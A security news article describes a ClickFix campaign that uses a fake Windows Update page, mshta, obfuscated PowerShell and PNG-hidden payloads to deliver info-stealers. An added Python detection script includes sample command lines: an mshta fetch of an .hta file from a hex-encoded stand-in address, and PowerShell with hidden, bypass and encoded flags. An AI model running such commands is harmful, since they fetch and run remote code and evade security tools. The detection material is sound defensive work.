Cybercriminals updated ClickFix malware to appear as an official Windows update, with the aim of tricking users into pasting a malicious command into the Run window.
The new version relies on a more elaborate chain in which a PNG image carries hidden data that, once extracted, deploys spy tools capable of stealing passwords, bank account data, cryptocurrency wallets, and more.
Huntress researchers uncovered this new version after noticing that it displayed a full-screen browser page that exactly mimicked the Windows Update window, with a progress bar indicating 95% of a “serious security update.”
The software is often spread on fake adult sites that imitate popular ones, appearing as an advertisement or an age-verification prompt. Once the user clicks it, the fake update screen appears.
The page silently copies a command to the clipboard and asks the user to press Windows + R and paste it into the Run window, giving the attacker administrative access to the device.
After execution, the command launches the Windows built-in mshta tool with a malicious link that fetches the payload from a hex-encoded address. Obfuscated PowerShell is also used to disable security tools and keep the attack from being detected.

The software then decrypts the PNG image, extracts the malicious commands hidden in its pixel data, and injects them into processes already running on the device. Info-stealers such as Rhadamanthys and LummaC2 are then deployed to collect passwords, personal data and keystrokes and send them to external servers.
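A defender-side illustration of the chain described above, added here as an example and not taken from the Huntress report: a small Python scanner over constructed, Sysmon-style process-creation events that flags mshta.exe launched from explorer.exe (the Run-window step), decodes hex-encoded addresses found in the command line, and flags obfuscated PowerShell launched underneath it. The event shape, field names and all sample values are assumptions.

```python
import re

# Constructed sample process-creation events in a Sysmon-like shape (not real telemetry).
SAMPLE_EVENTS = [
    {   # Run-dialog launch: explorer.exe spawns mshta.exe with a hex-encoded address
        "parent_image": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\mshta.exe",
        "command_line": "mshta.exe 687474703a2f2f757064617465732e6578616d706c652e696e76616c69642f612e687461",
    },
    {   # Follow-on obfuscated PowerShell spawned by mshta.exe
        "parent_image": r"C:\Windows\System32\mshta.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "command_line": "powershell.exe -w hidden -nop -ep bypass -enc SQBFAFgA",
    },
    {   # Benign: a user opening Notepad from the Run dialog
        "parent_image": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\notepad.exe",
        "command_line": "notepad.exe",
    },
]

# A run of at least 8 hex byte pairs that is not part of a longer hex/alnum token.
HEX_RUN = re.compile(r"(?<![0-9a-fA-F])((?:[0-9a-fA-F]{2}){8,})(?![0-9a-fA-F])")
# Common evasion switches: hidden window, encoded command, policy bypass, no profile.
PS_FLAGS = re.compile(r"-(?:w(?:indowstyle)?\s+hidden|e(?:nc|ncodedcommand)?\b|ep\s+bypass|nop\b)", re.I)

def decode_hex_runs(text):
    """Return the printable ASCII decodings of long hex runs found in text."""
    out = []
    for m in HEX_RUN.finditer(text):
        try:
            decoded = bytes.fromhex(m.group(1)).decode("ascii")
        except UnicodeDecodeError:
            continue
        if decoded.isprintable():
            out.append(decoded)
    return out

def analyze_event(ev):
    """Return findings for one process-creation event (empty list = nothing suspicious)."""
    findings = []
    image, parent, cmd = ev["image"].lower(), ev["parent_image"].lower(), ev["command_line"]
    if image.endswith("\\mshta.exe") and parent.endswith("\\explorer.exe"):
        findings.append("mshta.exe launched from explorer.exe (consistent with a Run-dialog paste)")
    for decoded in decode_hex_runs(cmd):
        if "://" in decoded:
            findings.append(f"hex-encoded address in command line decodes to {decoded}")
    if image.endswith("\\powershell.exe") and PS_FLAGS.search(cmd):
        findings.append("PowerShell launched with hidden/encoded/bypass flags")
        if parent.endswith("\\mshta.exe"):
            findings.append("PowerShell spawned by mshta.exe")
    return findings

def scan(events):
    """Map event index -> findings for every event that produced at least one finding."""
    return {i: f for i, ev in enumerate(events) if (f := analyze_event(ev))}
```

Running `scan(SAMPLE_EVENTS)` flags the first two constructed events and leaves the Notepad launch alone; in practice the same checks map onto Sysmon Event ID 1 or EDR process telemetry.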
The Huntress report indicated that this version has been spreading since the beginning of October, and that many sites are still hosting the fake update window with varying degrees of complexity.
Attackers commonly hide code inside seemingly innocent images or inside heavily obfuscated code to confuse security researchers and conceal their intent.
This version of ClickFix is one of the most sophisticated and dangerous data theft methods. Users are therefore advised to avoid clicking on ads or running any unknown commands, and to always check page links before interacting with them.